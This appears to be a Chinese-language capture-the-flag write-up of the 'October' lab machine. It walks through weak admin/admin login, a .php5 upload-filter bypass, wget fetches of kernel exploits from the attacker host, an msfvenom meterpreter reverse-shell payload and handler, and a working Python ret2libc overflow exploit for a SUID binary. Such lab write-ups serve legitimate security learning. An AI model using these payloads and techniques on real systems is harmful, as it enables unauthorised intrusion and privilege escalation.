october(弱密码+文件上传)

10.10.14.7

1
2
3
4
5
6
7
8
9
10
11
12
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
|   2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
|   256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_  256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

第一步,确定版本漏洞和exp
searchsploit Vanilla,

searchsploit october,没有直接可用exp

第二步,得知有很多exp,于是检查目标的详细版本

1
2
3
4
nikto -h 10.10.10.16

Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21

手动翻网页,没有找到版本信息,于是dirbuster fuzz一下目录。

结果是目录很干净,除了论坛、用户、博客三个目录,有用信息不多。

http://10.10.10.16/forum

第三步,分析exp
searchsploit -m exploits/php/webapps/25720.txt
leafpad /root/Desktop/16/25720.txt

找到了后台:http://10.10.10.16/backend/backend/auth/signin

admin/admin,登陆成功


尝试文件上传,txt可以上传,php不可以,PHP不可以。


但是php5可以,说明是黑名单的限制方式。

获得一个shell

info enum:

1
2
3
4
os: Ubuntu 14.04 (Linux 4.4.0-78-generic)
whoami: www-data
exist user: syslog:x:101:104::/home/syslog:/bin/false
      		harry:x:1000:1000:Harry Varthakouris,,,:/home/harry:/bin/bash

trying1:检查web config文件,查找口令

1
2
3
4
grep -R pass .
OctoberCMSPassword!!

python -c 'import pty; pty.spawn("/bin/bash")'

获取bash shell,尝试用口令登陆。登陆farry用户失败。

trying2: 尝试数据库登陆

发现数据库以mysql用户运行。

1
2
3
4
5
ps -ef | grep mysql
mysql     1197     1  0 Feb18 ?        00:02:16 /usr/sbin/mysqld

netstat -an
unix  2      [ ACC ]     STREAM     LISTENING     10089    /var/run/mysqld/mysqld.sock

trying3: 上传sh脚本


有gcc,于是可以尝试内核漏洞

1
2
3
4
5
wget http://10.10.14.7/dirty.c
wget http://10.10.14.7/dirtyc0w.c

wget http://10.10.14.7/chocobo_root 
执行结果:i have no offsets for this kernel version..

执行了三个exp,都失败了

trying4: 上传msf反弹payload

msfconsole -r job.rc 执行监听

1
2
3
4
5
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.14.7
set LPORT 7766
run

将载荷发送到目标机,并且运行。
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.14.7" LPORT=7766 -f elf -o 123

1
2
3
4
5
6
7
8
9
10
11
[+] 10.10.10.16 - exploit/linux/local/apport_abrt_chroot_priv_esc: The target is vulnerable.
[+] 10.10.10.16 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.  编译时缺少模块libc6-dev-i386,失败
[+] 10.10.10.16 - exploit/linux/local/pkexec: The target service is running, but could not be validated. 
[*] Post module execution completed

set SESSION 1
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.14.7
set LPORT 8899
show options
run 失败

writeup: suid程序以及python exploit编写

之前用脚本检查过suid权限,但是/usr/local/bin/ovrflw,并不是常见的suid 提权程序,于是被我忽略了…

ovrflw是一个二进制程序,有缓冲区溢出漏洞,可惜我还不会写利用程序。
cd /usr/local/bin;./ovrflw

overflow.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import struct, subprocess
libcBase = 0xb75eb000
systemOffset = 0x00040310
binShOffset = 0x00162bac
libcAddress = struct.pack("<I", libcBase+systemOffset)
exitAddress = struct.pack("<I", 0xd34db33f)
binShAddress = struct.pack("<I", libcBase+binShOffset)
payload = "\x90"*112
payload += libcAddress
payload += exitAddress
payload += binShAddress
i = 0
while True:
	i += 1
	if i%10 == 0:
		print "Attempts: " + str(i)
	subprocess.call(["/usr/local/bin/ovrflw", payload])

总结

编写python脚本,利用段错误,通过缓冲区溢出得到root权限,需要很多基础,不是一时半会儿能学会的。继续加油吧